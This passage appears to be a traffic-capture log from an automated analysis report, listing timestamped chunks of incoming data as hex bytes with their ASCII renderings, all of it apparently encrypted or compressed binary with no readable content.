!Kf(PN9L/C\0@y3d"&noa!(PZqcx^[x$;d#*B.~b(w54}]}:5dp[B@J3OI=d`qN6M\&W#3jp-V{ITn69e=sI>x+f%+&]K!{i
2023-10-13 13:21:14 UTC	5790	IN	Data Raw: a2 c3 02 23 fd 9a 5d 01 e7 69 e3 f8 a1 36 4e e5 21 e6 8f 7b d0 b9 c1 73 9d 46 11 7a c7 74 1d 23 d1 3b fa b9 0f 87 23 a4 15 42 57 90 c3 5c be 33 31 d7 c6 5d 44 e8 50 42 13 80 42 ad fe 9a 23 fd a6 52 d9 d7 b2 dd 94 54 d4 d8 29 99 d8 05 86 23 4b 3f 02 50 ad 28 74 3d c8 5c 5d 7e 0e c3 bb 22 5e 2e 97 2e bf 66 e1 3d f9 5c 67 39 97 b4 4e 3b 25 0b 4b de 7b a9 26 2a f4 c9 ee 93 ee eb f8 69 ad f1 0d e3 99 62 3d dc 62 63 08 8b 47 c0 94 4a 65 b1 c6 23 67 cb 4d ce e8 74 ca 73 f4 10 63 85 15 0f f4 d4 04 33 12 ba f9 b5 1f 44 a5 22 72 6b 67 68 03 d3 5a ee c8 0a 47 a4 f3 4d 04 4f 60 30 07 20 a5 74 3f 9b b5 c4 13 7a 10 a4 6b ec de 0b 0e 81 92 ba ce 6c 37 a8 0e 6d c9 57 ce a7 bd 7c e9 6e 1a d1 e0 6f c1 9c a4 5e 1b b1 ce 49 ac 86 2d aa 6b fa 72 bc 7b 93 aa ec e8 ee 75 a6 34 Data Ascii: #]i6N!{sFzt#;#BW\31]DPBB#RT)#K?P(t=\]~"^..f=\g9N;%K{&*ib=bcGJe#gMtsc3D"rkghZGMO`0 t?zkl7mW\|no^I-kr{u4
2023-10-13 13:21:14 UTC	5806	IN	Data Raw: 6c 41 f2 40 de 21 09 c0 59 d4 8c eb e0 3c 5e 1b 03 7d 01 e9 28 a9 9a 55 bc a3 d6 60 ad 94 ae 3a 78 c7 f3 d4 68 23 a6 6a e1 67 ef 85 a8 f3 58 99 e4 7e 3a 20 5e 51 a0 bf 9d 8f 23 7b d6 81 df 58 e5 c3 79 2f e3 d9 99 6b b3 4e b2 fb 0c c7 25 ea 13 c8 7a 5d 10 8a bb 68 67 e0 eb 42 10 9c 65 60 ec c8 e4 4c 4f 4e d8 66 39 85 3b d6 5d a6 54 3f b6 27 23 39 1f a7 cc 13 bc 73 b1 9f 0b 4e ec d3 a3 ec d5 15 9b a1 7f db 17 8c 2a f9 00 ad 6b bd 75 4a a4 ad 75 05 91 2c be 5b 0e a5 2d d9 06 41 71 60 a4 84 d4 8a ab f6 f8 43 40 5a 13 31 2a 30 3d 0e 85 6b af 33 60 b1 b4 39 76 cd dc 70 9e 66 ad 3b 27 01 4e 08 05 5b e9 87 f2 e3 88 a7 3c f7 c6 d4 e3 a5 86 67 03 85 93 56 25 b8 71 86 0d 67 2c fd 25 04 90 7f 83 49 a9 f3 ff 32 dd b0 b8 50 85 d3 06 ef ce 6d 3a a7 4b 8b 59 9b df cd c5 Data Ascii: lA@!Y<^}(U`:xh#jgX~: ^Q#{Xy/kN%z]hgBe`LONf9;]T?'#9sNkuJu,[-Aq`C@Z10=k3`9vpf;'N[<gV%qg,%I2Pm:KY
2023-10-13 13:21:14 UTC	5822	IN	Data Raw: 5f 97 cb b5 6b ab 7b 68 19 8d 96 fc de d9 4d 39 de e2 89 6c 93 96 3a 8c 39 6e cd 46 47 d8 81 50 d9 d4 43 d8 c1 e4 bc 45 85 29 b9 36 3f ac da ef bc 78 5c 39 ef b8 3e 41 fd 7f 91 f9 8f 6a 8c 24 89 38 ef 0e 0a db 6f a4 8a 9e 48 fa 1c 95 98 64 17 71 e6 63 b8 99 ba 10 d3 a3 61 82 57 c5 3c 1c ca f7 07 b1 79 84 35 e7 5c 58 e4 a7 c1 13 dd b3 e0 21 48 1b ed fb 65 c4 f2 9d bb 3b 69 fd 28 28 34 98 cf bf 16 3b dd e1 c1 75 77 5f ed 07 0a 4b 4f 96 bd 8a b5 a6 be a2 34 9f b6 2d f3 d8 c3 e3 87 4f b6 db ce 82 26 40 34 cf 29 be 86 9a ba 4b e9 5d 63 c9 b6 a6 1d e3 2e 06 a1 5d 66 e5 f1 c1 97 b8 32 24 8d a5 40 7c 88 f8 a5 8b 07 0b fc 30 07 fa 42 c1 a0 18 79 0f a9 24 65 ab 27 a4 7b c1 03 54 c7 72 ad b4 74 a8 b6 2d 2a 41 36 9f f2 1f f3 68 c6 80 1f 00 e9 b8 ec b8 b5 6c ee 11 f1 Data Ascii: _k{hM9l:9nFGPCE)6?x\9>Aj$8oHdqcaW<y5\X!He;i((4;uw_KO4-O&@4)K]c.]f2$@\|0By$e'{Trt-*A6hl
2023-10-13 13:21:14 UTC	5838	IN	Data Raw: 53 db d9 e2 59 ae 49 b4 6c b2 3a 2f b1 35 a2 15 95 3b 4d 77 96 05 54 aa 14 52 f7 73 47 3b d6 14 54 d3 c4 16 68 02 d2 95 cf 45 1b 6f 01 6f 3e fc be 11 16 3b 97 36 52 24 74 6b 90 51 63 51 c4 0c e4 64 a9 76 10 cd f1 00 c7 74 78 72 b8 29 68 99 15 68 26 a4 c5 7d 30 ee b4 d3 08 b5 18 bf c2 ed 1b e5 67 d3 68 2e 60 2b df 42 a2 f4 fd c4 9f 55 ef 9c f7 86 f1 18 b1 a9 3d 52 b6 43 0d d6 76 29 c0 16 7a 8a 94 58 71 34 76 03 56 c3 3c 77 f6 b1 7a 2c bd d3 c5 70 72 24 d9 fe c6 73 da 52 93 6d 4b 79 6b a9 57 21 e9 7c 1c c0 b6 b4 79 7c b3 6a ca 30 ca fc a3 fc 7b b1 05 81 46 49 49 73 31 c2 7a f6 9f e2 56 2e 8e a7 7c c5 36 f4 71 6c 76 50 f4 b8 a5 a3 84 77 1f b4 54 59 8b f3 1b 3b be c2 8a d2 22 7d 16 2e 37 98 bf 2e 45 63 1a 6c c0 70 8a 35 6e 02 c2 fc eb 2e d4 ac 82 9b c1 e2 08 Data Ascii: SYIl:/5;MwTRsG;ThEoo>;6R$tkQcQdvtxr)hh&}0gh.`+BU=RCv)zXq4vV<wz,pr$sRmKykW!\|y\|j0{FIIs1zV.\|6qlvPwTY;"}.7.Eclp5n.
2023-10-13 13:21:14 UTC	5854	IN	Data Raw: 1a fb a7 fe 80 ac c5 24 f8 f2 66 77 fa bc b9 36 2e df 91 02 0e 0b 54 15 c0 9c 67 ea 06 06 2c 5c 9f 58 f2 11 b1 08 42 b6 ea 4c 31 46 49 82 eb cb 44 33 24 b9 a6 2f 28 47 26 cf 3a e9 43 a9 e0 c0 2e c8 89 da 59 b0 b6 59 bf f9 c6 bc d2 37 59 d0 a1 2f 61 8f 03 c2 27 a7 ab fa 0f 4b 8a 21 2d db 73 36 05 dd 11 de f1 67 96 d0 73 1c 4c bd 9f 41 24 fb 5b f3 b0 19 52 36 99 6c 36 2a 0e 17 46 96 65 15 f1 23 cd ec 6e ef 05 f0 29 da 5d e6 b7 ea 45 95 a2 d4 46 af 9d bb 4d 8a 2f 48 51 c1 e9 5e d3 b5 96 cb cd 8a 85 80 1a 10 9a 68 b6 97 8f 32 4c 5a ca 61 1a a6 f2 b6 4b 0b a5 42 d5 01 cd 7d 2a 0d 0a 44 7e 02 cc ac 56 a6 e7 a9 3b dc ca 93 93 86 58 43 ae ed fa 60 f0 bd cf 71 27 71 35 f4 68 fc cb 4f df 90 cc fe 11 bd 1b 39 62 61 af 6b ba 25 1c 8b 6c 4f 7c 2a 96 cd 38 83 72 22 97 Data Ascii: $fw6.Tg,\XBL1FID3$/(G&:C.YY7Y/a'K!-s6gsLA$[R6l6Fe#n)]EFM/HQ^h2LZaKB}D~V;XC`q'q5hO9bak%lO\|*8r"
2023-10-13 13:21:14 UTC	5870	IN	Data Raw: 9c a8 29 07 ab 8b 1d f6 b8 8b 4f c1 e2 bb 83 ad 35 c9 c4 3c 2c d5 c6 2d df 69 11 7e 32 0f a8 29 89 ce 13 d0 3d 7b 34 eb 81 1d 35 d2 c5 90 97 53 75 d8 63 ec e6 2b 25 4c 36 3a 49 5d 8f f5 40 3a b3 04 a9 16 1c eb c8 61 01 7b fe a0 c4 be 8c 79 8a ce 38 3c 79 88 dc 97 10 b1 23 2e a3 d1 6f a5 24 5f 9a 1c 6d 8b 55 cd 8d 5c 7a f7 51 b7 e5 e1 27 66 6f bf 8d 08 d1 53 c8 55 44 f0 82 2f 9e e8 a0 46 13 f6 1e 03 9e cc 06 8b d1 26 8c 80 4e cb 35 24 6b 18 68 ea f3 02 f6 4b a9 83 8e 39 b2 1e 35 16 47 94 bf 77 57 02 e8 e8 c1 8e 80 0e 51 01 99 a2 81 bb f0 20 e4 7f 0c 16 59 e4 b0 ff 55 18 d5 6f 35 08 b8 1c d4 63 af 1a 1a 26 2e 20 3b 2f 92 c6 c0 46 26 07 f9 30 69 46 85 c3 0e bb 1f 3f 7f d2 f1 47 62 a5 c1 57 34 d7 89 cb c5 e8 46 e9 c1 64 6a 95 8f 78 87 a1 9c e3 cb 74 05 54 9e Data Ascii: )O5<,-i~2)={45Suc+%L6:I]@:a{y8<y#.o$_mU\zQ'foSUD/F&N5$khK95GwWQ YUo5c&. ;/F&0iF?GbW4FdjxtT
2023-10-13 13:21:14 UTC	5886	IN	Data Raw: ba 8a f5 8d 09 66 f6 0c b2 f7 d3 9c 16 19 ea f6 42 a8 ca 1b c4 09 66 4d 23 51 b1 e2 81 a0 4a 95 2c f6 0a c3 8b 51 3e 21 fd 20 df 43 90 31 b7 97 03 a7 e0 fe 48 9d 46 87 1d 4d 41 6c dd 24 44 c8 87 54 dd 7d 91 39 4f ae 3e be 1a c5 12 39 01 40 59 12 ca 0a b0 84 66 9a 59 34 d4 1c 15 53 65 7a 44 c2 2f ea b4 6d 26 0e 77 bc 31 61 6a f3 d9 27 db ab f1 b9 25 2f 86 20 f3 b9 3c 9d 81 ef fd 6c fa 51 a9 5c 22 92 33 ad 58 f6 2d ba ab a0 c4 3e ac c0 06 fa ed 34 e0 ea 7c 6a e2 ee 12 b9 e9 57 b6 4f 1d e5 f6 3e 9d 6e 9a 92 14 41 4b cd d9 d5 0d c5 ab 6b 80 7a 2f 12 9c 85 64 48 6f 1e 28 79 e4 52 34 ec 95 75 31 cb f9 1c ad 64 eb b4 8e a3 6b e0 b1 11 31 6a a1 d1 b9 89 ec 23 b7 cc c1 d5 fd 64 3f bb d5 23 98 33 49 30 8f 3a 53 87 22 1c 34 3b 1e af 2c fe cb 19 42 7f 5c f2 09 2a 0d Data Ascii: fBfM#QJ,Q>! C1HFMAl$DT}9O>9@YfY4SezD/m&w1aj'%/ <lQ\"3X->4\|jWO>nAKkz/dHo(yR4u1dk1j#d?#3I0:S"4;,B\*
2023-10-13 13:21:14 UTC	5902	IN	Data Raw: e7 b3 65 9f 91 69 15 49 66 be 31 50 c3 7a 8d f7 af f9 9d f9 86 59 64 2d 8e ae d1 56 5f 64 c9 dd 73 e2 f4 bf 62 ac 40 a5 c6 82 d1 32 32 e2 c8 3a 9c 6b 2f 7c 00 38 01 95 a2 0a 3f 67 48 48 6e 43 17 24 39 81 cc 87 8a fb 15 ca fb cd 8b 8d 40 50 ee 56 f7 9f 40 7e 96 75 d1 e6 d8 47 4b 3e 7e 95 98 45 0d 78 7b 95 77 eb d4 5e 92 b5 46 e6 3c 2e e8 d6 4f 24 7a e7 2f 11 c8 93 88 d8 c0 7b 56 ec 3a ce c4 6a d7 69 0e ac b5 8d ee 27 34 d2 55 3c df b6 a0 e6 32 ee e7 a1 31 b6 42 ad ad db 7f de 9e 83 86 3a 02 b0 f4 e3 ab ba a1 1e cb da e8 00 83 b8 1e 37 36 b5 ab da 77 6d 13 3c 86 28 b4 59 4d 0c 9f 14 b0 4e e5 57 d6 41 d2 5a cc 55 1b b7 82 06 cd 34 de 80 58 f0 21 a6 f8 26 38 31 d9 d0 32 6c bf a5 01 e8 53 df 0a ed b5 ff e0 40 d1 31 43 83 22 7e 4c 33 36 a1 4d ac 85 fb f2 8d c0 Data Ascii: eiIf1PzYd-V_dsb@22:k/\|8?gHHnC$9@PV@~uGK>~Ex{w^F<.O$z/{V:ji'4U<21B:76wm<(YMNWAZU4X!&812lS@1C"~L36M
2023-10-13 13:21:14 UTC	5918	IN	Data Raw: 2f 00 a4 97 b2 10 82 9e 1f 68 ff 46 82 a3 a3 28 ba d0 63 7a 8f a9 93 e6 59 d0 08 fc c9 ea 6d 2a 6b a5 cd ef 33 d4 08 4e bf 98 91 b6 b2 0c b4 a0 47 f4 a5 9c 6d 69 b3 25 1b 83 25 99 18 98 69 0e a6 59 f1 d3 ec 27 01 38 40 46 d2 db f7 95 09 1a 40 85 22 d6 30 98 4b 7b b3 c1 b6 32 f4 2e 7e 60 84 1a ec 54 52 e8 3d 23 b4 bb 57 9d 3b 39 d1 53 22 ec 58 40 e5 4a d3 4d 53 19 b3 38 45 cc 52 9a 43 eb 26 1d 2f 6a 77 b6 23 27 13 fc 0a a7 81 c2 f6 37 ac 6b 99 f8 55 6d 8d a4 c2 48 8d f1 e7 f5 cb c7 49 48 25 f4 59 75 e0 f1 74 dd 0d 56 af f9 e6 bc af f9 8a 57 b2 9d 48 a5 ba 85 21 bb 82 fe dc 45 39 b5 c2 49 a8 3d 80 6d 46 5a 66 5b 31 38 ac aa 9d c8 b0 e3 61 90 62 f5 bd 33 a0 5c 39 13 35 bc 26 ae f5 f9 c3 e9 48 2a c6 86 c8 a5 58 05 55 1d 6f 7b d5 3b b8 60 ba a3 6d 12 2d 6c c9 Data Ascii: /hF(czYmk3NGmi%%iY'8@F@"0K{2.~`TR=#W;9S"X@JMS8ERC&/jw#'7kUmHIH%YutVWH!E9I=mFZf[18ab3\95&HXUo{;`m-l
2023-10-13 13:21:14 UTC	5934	IN	Data Raw: 16 df a6 52 48 5c 71 47 0f 07 02 90 1b d3 06 cf 9f 0c b6 15 51 bd f9 81 36 64 0c ba 44 72 ba 67 6b d7 af bf ce 7e 13 8b 1a 2d 85 6a 4b cf 2e 10 57 26 12 86 b0 b1 74 f1 5e 44 02 67 f1 3b a0 49 61 8f 9c c9 be 26 c4 7e 3a 6a 83 3e 4d 11 61 02 43 65 97 94 65 cb 87 7b 84 a3 e7 50 dc 82 d6 b6 a0 d4 d8 e8 3a 96 7f a5 87 bc 59 67 c4 6f 68 9c 9b a9 c7 52 0e 9e 29 d7 d7 6d d6 29 83 a5 f7 e6 ad f7 bd ca 5c e5 7b 91 ac 79 4f f6 46 27 52 18 7d 97 4e 80 f4 9a ec 6e fb fa 3c c9 4d 44 54 24 4d 04 ef 15 3b cb 41 5e 51 9c 6a 6b ae e1 da a8 75 0d de 33 ce d1 80 4a 8b a4 b4 fb df bc fa 8e 24 a3 21 e4 e4 2f 72 06 9a c1 57 6f 23 6f 21 76 84 89 ea c0 da 58 48 ed 7c ec 1d bb a1 37 c2 52 44 dd 51 b4 55 12 cf f9 64 d0 3e 0a e1 9c fe 15 3d 1d fe b7 d3 77 ba c6 eb 9d e1 c1 04 b8 d1 Data Ascii: RH\qGQ6dDrgk~-jK.W&t^Dg;Ia&~:j>MaCee{P:YgohR)m)\{yOF'R}Nn<MDT$M;A^Qjku3J$!/rWo#o!vXH\|7RDQUd>=w
2023-10-13 13:21:14 UTC	5950	IN	Data Raw: 93 0e 48 fd 48 bd f9 37 36 68 12 24 42 d2 50 e5 5a 20 ac e7 91 b7 59 88 59 a4 3c 04 40 f6 db af 28 a3 f5 4b 46 c9 25 69 52 c1 e2 15 fb 8c c0 5f de 00 ed b9 c6 0d 7d 1b 45 d4 f1 60 fd ed b8 e6 6b 74 25 db 1d ea b6 bf fc 3f d5 fc 73 6d a1 7e 31 36 53 1f 29 b8 8b 90 a1 b8 d7 34 11 04 97 71 b9 06 ae cb fd f7 fa f5 4f 91 55 f7 e6 82 e3 2d b5 97 e5 79 79 ca 6c 37 ec a9 fa bc e7 fc 8b 03 25 7d b9 ff 2d ad 01 ce 69 d8 2f 87 dc d8 f2 a7 f5 e2 12 e2 85 98 e7 1f 0c 42 1c 76 07 10 c6 77 1e 98 ad 73 2d 1b ad 37 4e 4a 80 3c e5 62 ff dc d2 17 dd 21 e4 b5 8c f3 a2 6a 65 b0 ca 30 ce 9e 9d 47 13 ef fb b2 b1 61 8b 44 ec 9e 3d 88 4a 9c 5a af 4e dc 53 87 a8 b8 48 ff f8 30 ad 15 8e dd da 40 00 fc fc 85 07 d1 2e a8 a2 fd 0f 80 20 46 60 8e 0f e6 68 f1 17 9b 1f eb 18 cf 52 59 d3 Data Ascii: HH76h$BPZ YY<@(KF%iR_}E`kt%?sm~16S)4qOU-yyl7%}-i/Bvws-7NJ<b!je0GaD=JZNSH0@. F`hRY
2023-10-13 13:21:14 UTC	5966	IN	Data Raw: 4e af a8 09 49 f6 61 ac 63 dd 8c 19 b3 24 09 45 17 e6 e0 f9 e7 b5 2d c0 c0 9c 99 f3 31 3b f5 52 01 ff f0 3e 2d 33 23 19 ab 05 84 92 2f 54 fc ec fb 19 a7 03 d5 23 f4 e7 da a4 2e 95 0b 16 44 08 38 da 60 fa 8b b6 b8 fa ac 39 a9 62 79 be 67 d9 8c 66 b7 fa c7 53 18 d4 29 17 ff 93 98 29 ac 73 9b 4f f0 56 e0 4e 85 58 7d c0 78 f0 c0 bc 4a 94 b0 d2 ff 79 a3 a9 5f 94 38 39 45 52 9f d1 f0 29 57 51 a8 fb 84 6f ac 36 4f 22 59 98 7e 47 1e ab 83 6f c3 47 27 81 56 37 e9 2a c5 9e f9 67 0b 8b 46 da 57 ce 04 14 86 71 6a 94 dd c6 52 8e 73 65 9e 50 3f 05 55 c5 a4 ca fb 3c 3e d6 98 7b a9 76 44 eb 41 05 ef 0f 94 dc 9c 55 9d fc 1e 35 90 fb 55 48 8f a8 c7 e6 17 d8 f2 54 46 fb f8 34 23 1a a5 f7 33 01 53 14 20 bc 29 60 50 e3 d6 89 e3 b6 be bf 4a e7 d8 2d 6c 95 30 cf 61 39 fb 7f 35 Data Ascii: NIac$E-1;R>-3#/T#.D8`9bygfS))sOVNX}xJy_89ER)WQo6O"Y~GoG'V7*gFWqjRseP?U<>{vDAU5UHTF4#3S )`PJ-l0a95
2023-10-13 13:21:14 UTC	5982	IN	Data Raw: 5b 73 22 85 91 c2 bb 37 27 51 22 d1 22 92 e7 99 a4 70 40 35 71 39 e5 50 22 9a 3e 9a 8d 61 1d 79 6b 45 06 b5 c9 6b a7 fd e0 ce 31 ad 8c 6c a0 50 2e 7f 48 93 75 51 e4 90 a1 a4 c5 f7 4c fe 5a 37 58 c5 97 87 cd 0e 2c 8d d0 75 8d 93 60 ff bf 3d 55 91 32 c0 53 d6 21 9b a5 80 b8 b5 37 8a 12 a1 f6 1d 7d fa a7 d0 fa 96 3a d9 55 bf 41 ef ef 88 d2 16 0f 7e 02 36 e8 b4 c3 a6 4a 6d 17 0e 24 e7 47 ec 8a 77 fe 1b 7d fd 9c d7 da fe 3d e1 7a 21 f8 c7 68 f6 a9 a2 79 d3 e0 75 d6 30 6e 28 3c 3f 09 42 ad 4c 50 d2 0f cf 12 82 81 ac 95 4a 1a ee 6e 7c ee a2 75 32 28 09 06 aa 22 69 a7 15 93 e2 d8 14 08 26 d9 f9 f4 d5 86 16 cb 46 45 d0 be 5b df 4e a3 64 4b 35 c4 17 b3 10 dd e0 b6 7b 7a 8d 00 9f 84 5a a2 9a a2 58 02 38 14 2a 4d 0f f2 30 7e 5f d7 19 85 2f 51 6f 8f 62 29 92 ef 4d 62 Data Ascii: [s"7'Q""p@5q9P">aykEk1lP.HuQLZ7X,u`=U2S!7}:UA~6Jm$Gw}=z!hyu0n(<?BLPJn\|u2("i&FE[NdK5{zZX8*M0~_/Qob)Mb
2023-10-13 13:21:14 UTC	5998	IN	Data Raw: 75 4e 24 c5 18 5f 44 e6 48 05 fb d1 73 e3 fc 2b b3 ad 7c 06 c8 ac 77 00 aa 33 73 25 c7 69 f8 80 e7 32 2f 11 db f2 c1 fa fc 1d 33 2b 57 6a f2 3f 9d 35 c3 11 3c 14 ad 75 8c f4 bf 7c 32 4a d3 dc 84 80 89 b2 a5 af d2 4d f1 d3 36 be 83 84 3a e5 ad ac 33 1b 58 2c dd 01 dd 85 e2 58 14 95 68 b8 61 56 1c dd 9c fd a1 73 46 40 e1 ab a4 40 12 70 c4 a2 07 61 f3 ed b2 6c 9f 31 78 d1 cf 10 ba 77 e3 8d 36 ad 86 cb 93 4e d1 43 a2 88 a8 67 b5 1e 03 b8 c7 af cb 08 33 28 dd de 7c 1e 2b e8 e7 19 55 47 c0 41 11 a4 2c f2 d8 0f 3f 90 72 30 5a 57 20 94 12 83 60 a9 c6 9b ad 5d c4 da 51 4e 4b 6a 6b dd 99 47 19 a6 1b 8f 63 bd 9a fb 20 1b 84 55 11 f9 e2 05 7f b6 e8 4e 08 fc ce 62 83 dc 43 68 17 70 4d db 72 53 44 6c 36 4b 03 7f 1f 53 24 3b d2 03 62 aa f2 5f bf 88 b9 0f 7d dc 4b 24 d0 Data Ascii: uN$_DHs+\|w3s%i2/3+Wj?5<u\|2JM6:3X,XhaVsF@@pal1xw6NCg3(\|+UGA,?r0ZW `]QNKjkGc UNbChpMrSDl6KS$;b_}K$
2023-10-13 13:21:14 UTC	6014	IN	Data Raw: 6e e6 c9 18 a7 8e fc 13 be f6 d5 01 2f 7a 39 7c ed 17 43 3b f4 dd 90 71 30 21 68 ce de 12 70 48 90 78 06 c1 85 16 65 6b 0d 66 ad 4a 79 f3 f0 f5 19 4a 4d 0a 40 3a b0 ce eb e3 b7 e2 0b 4a 0f c7 e6 48 58 30 99 05 42 e3 d8 f4 38 26 9d 99 1d ad 8f 4d ae 0d 02 7f cc ed 91 5d 5d 7b a1 db 09 f1 12 b2 ff ab d8 8c 8a c2 58 26 85 8f 23 a6 71 74 bb b1 ed 7c ab 52 30 a7 2d 63 b4 19 23 13 5d a8 02 56 41 32 83 5c f9 49 f8 a2 d1 0f 69 04 65 7c 22 04 2b 62 fa d5 ad 11 3b df b8 01 bd 2d 43 3a e4 89 9c da 2c 6f fe 79 67 1f 0e 25 8f 89 ba cc 71 f7 bd d8 90 48 68 fc 6c 89 f1 a1 2c 6a 9d cc ce 92 1b be bf 88 5d 89 1f e5 91 97 0f 2c c9 53 d3 98 57 06 61 f9 cb be b1 49 9d 00 30 c5 be 6c b7 fb 00 58 70 6a 31 02 cc 7f 9b dc 38 be 94 ab c7 93 ee 37 9b fe ba 4a 87 3d a9 cf e1 5a 96 Data Ascii: n/z9\|C;q0!hpHxekfJyJM@:JHX0B8&M]]{X&#qt\|R0-c#]VA2\Iie\|"+b;-C:,oyg%qHhl,j],SWaI0lXpj187J=Z
2023-10-13 13:21:14 UTC	6030	IN	Data Raw: 51 da 87 e2 e7 e6 10 29 62 a6 b8 45 f7 a4 ab f1 52 0b ad cb fb ea 7a 27 2e 2b 9f b7 f9 e7 d0 27 35 fb 27 95 41 4c d2 1c ac 9a ef a3 8a c2 66 e5 0e 79 30 fb 16 96 fa d3 a5 4a 27 d6 d3 cf f7 38 8a 21 d9 6b 21 87 67 2d 91 c5 2b 4b 18 6e 69 12 50 d7 b9 cf 54 b2 e9 f8 3c 91 16 31 83 7f ce 94 d3 b4 f3 7c 28 f1 da 08 82 82 16 4e 27 49 71 79 9f c2 a8 78 75 37 a7 10 97 2b 38 1b 60 0c 39 55 bf 65 7f 46 ca 2a 8f 43 1f 87 fb 8f b2 ca dc 6b 0c b9 11 2a 8f 30 e4 dd 5b e5 c9 88 48 19 3c 9a 29 19 09 14 a0 db b5 7a d2 17 f6 e6 4b b1 34 6b b7 d1 ea 5f c2 6f 7b 85 a8 52 25 7f 43 8a 86 81 65 91 e9 a7 b8 ae 86 d4 b5 2a ad 84 9f a9 39 86 eb fb 5b f1 cf ec 59 b5 7d 89 8b 70 5a a5 dc 87 86 12 30 10 37 04 92 c6 cd 00 e0 d7 33 fc 44 a3 b9 76 74 14 fd 7a 0c af f3 cb 7d 7e df c6 e1 Data Ascii: Q)bERz'.+'5'ALfy0J'8!k!g-+KniPT<1\|(N'Iqyxu7+8`9UeFCk0[H<)zK4k_o{R%Ce*9[Y}pZ073Dvtz}~
2023-10-13 13:21:14 UTC	6046	IN	Data Raw: 86 74 22 93 d3 93 60 06 bf 9b 2f b7 1b 9a 34 1e a5 25 51 fc 4b bc ef 01 f0 b8 b1 94 95 ac 91 03 6b 44 68 6b 69 73 24 d3 83 57 dd 2f 01 26 8c 8e 6a cd d1 18 77 05 36 8e 54 ac fb 12 ab 74 c5 c7 9a 4b 4a 39 f4 8e 33 ff c4 7d a0 e0 91 6f 28 fc 7a a3 50 1f 2d b5 8b a2 0e 62 4b 5c eb 93 67 0d 42 b9 a5 f9 86 5a 03 d2 8b 15 3d 35 d1 4c 93 bc d9 ca 16 24 a9 6d e0 c6 6a 82 c1 da 54 37 ea 6c 70 ae d6 a3 4c 93 74 d9 a6 6d 71 a8 6d d3 91 28 ac c2 10 3c e7 4e 17 fb d5 18 a8 d9 6a 10 30 e8 ea ba 84 ce f0 70 c2 4f 19 8d f3 57 f9 8c 48 21 4b 02 9e a1 76 69 a7 20 30 fc 5f e7 2b a7 99 4a 0d a6 eb 47 50 fc 00 09 5d fb be b5 eb 08 5f c5 75 dd a3 05 c9 29 bf a6 c9 88 7e 3e ff 5e 81 cc f7 51 88 99 b4 45 87 e0 25 a3 34 ac c5 c7 90 51 34 fb 9a 89 c9 85 83 aa da 14 aa 5f dc 4b dc Data Ascii: t"`/4%QKkDhkis$W/&jw6TtKJ93}o(zP-bK\gBZ=5L$mjT7lpLtmqm(<Nj0pOWH!Kvi 0_+JGP]_u)~>^QE%4Q4_K
2023-10-13 13:21:14 UTC	6062	IN	Data Raw: bb d5 7d f5 3f 0d 6b 71 51 d1 ab 8b 1d 75 c8 40 0a 91 c0 70 8d 9e 3a 0b 23 ca 1c 98 1e fd 05 cf d7 40 6d 80 23 37 b7 7c 82 32 48 12 17 d6 de e7 f2 18 4f 87 a0 00 77 13 57 51 f5 1d b3 9f e0 fb b7 02 0d 59 f3 a4 c8 36 05 f5 de aa d0 fe 5b 4e e6 cb 8e 00 d1 d9 bb 22 5d cb e9 c4 70 63 77 6f ae fa 97 ba 1c e1 5d 24 22 6c 99 37 57 c2 00 2e 3c 7e 9b 30 7d 65 21 11 39 65 16 14 62 1e ef 2e d9 17 6b c5 31 a2 b9 ea 1a 84 37 ce 1d 16 30 85 a8 be b0 f7 64 8f 05 ff d6 cd d9 07 61 30 77 79 93 ee 96 76 d3 2c a6 3e 64 95 25 93 b9 e6 e1 f3 c1 3f 3c 56 2c ac ba f9 43 61 94 73 3c 9c 0c 3d 3d fd 05 3f bf ff a4 40 4e 65 60 b8 83 29 dd 2b 69 4e 5d 04 94 d6 b8 0b e7 a7 a6 8a 04 fd dd df 3b 6c ce da d8 06 d1 10 36 cb cb bd af 08 59 4b 44 ff 18 d1 41 06 43 3b fb 2c c6 41 88 74 d7 Data Ascii: }?kqQu@p:#@m#7\|2HOwWQY6[N"]pcwo]$"l7W.<~0}e!9eb.k170da0wyv,>d%?<V,Cas<==?@Ne`)+iN];l6YKDAC;,At
2023-10-13 13:21:14 UTC	6078	IN	Data Raw: f2 df 08 df 5b 1f 11 25 91 06 5d 74 5d 5d 41 83 45 da 24 35 d6 fc 6a 1a 76 eb d2 a7 1e 69 1f 0f 8a 21 53 d2 da f3 bb 3e 06 4c b2 b0 3c 83 9b 3b 49 d6 e0 14 5b be c8 2d fe 7e 5c 46 4d b1 a0 a9 8c e1 54 77 ff 05 c9 a7 d0 d4 b9 36 3f dc 2e 77 cf 30 0e c9 10 14 99 fd 2a 0a 5a fa 45 ea c4 60 ab c1 24 d7 1b b9 05 35 ff 56 d9 08 22 07 58 47 ef 49 33 90 a1 bb 44 10 91 e9 3f 23 74 72 71 db dd 0f e7 21 3f 58 77 0f 33 f2 34 4d bb 2c 20 d8 38 a2 78 6e cd 3f 61 73 29 0c 48 ac e5 99 b2 7e 5a 99 95 de eb 4e 4d 8e f0 c2 2a 4a 0f 5d af 61 e2 da cd 6a 06 98 7b 92 40 90 88 11 0a 52 e5 fa ac ec 96 63 a5 9f 3b 89 a5 38 83 02 04 13 19 c9 d8 4f 53 5f 07 32 b6 c1 71 58 7c 9a 47 7f f4 44 a6 90 06 0e 06 e6 33 07 bf 72 9a a6 16 40 95 12 32 1c 2d f9 b8 2d 35 a0 b6 83 fd f6 44 17 46 Data Ascii: [%]t]]AE$5jvi!S>L<;I[-~\FMTw6?.w0ZE`$5V"XGI3D?#trq!?Xw34M, 8xn?as)H~ZNMJ]aj{@Rc;8OS_2qX\|GD3r@2--5DF
2023-10-13 13:21:14 UTC	6094	IN	Data Raw: d5 e3 c3 2e 41 d2 30 0b 73 22 12 32 f2 58 44 96 03 5e 17 73 d9 c7 1f e6 b2 8a 0c 01 2d 3d e6 13 58 ec e2 db 35 ca b8 d3 d5 b4 7b bc a6 e1 7e f1 cf 3d c0 c5 bb 27 b6 c7 ef 2f e9 82 71 8d ad 25 fa bc 59 00 c5 a1 79 40 35 3c a2 82 36 45 02 00 e3 8e b6 01 3c 12 7c f9 24 de 6f 42 ee a6 38 d6 fa 36 ef 99 1d 81 b5 72 18 bb f4 60 6c 5a b4 31 2f d3 d9 31 96 9b 8c 06 f9 fe cf d6 97 f7 c9 4a 4c 36 1c a0 b3 84 3e 9d 43 3c fc 74 f2 e0 4a 05 2b 84 e1 a7 eb ea bd db 87 7a 69 f2 30 75 f0 b7 45 c2 2e 84 f9 24 15 80 94 e6 0c 5a ff d0 6f 30 3d 8a be de 24 12 a9 24 e2 15 2a f3 a7 05 f8 5b a5 62 cb 20 55 4d d4 1c 84 d1 4a a5 d3 e5 54 33 da bc 66 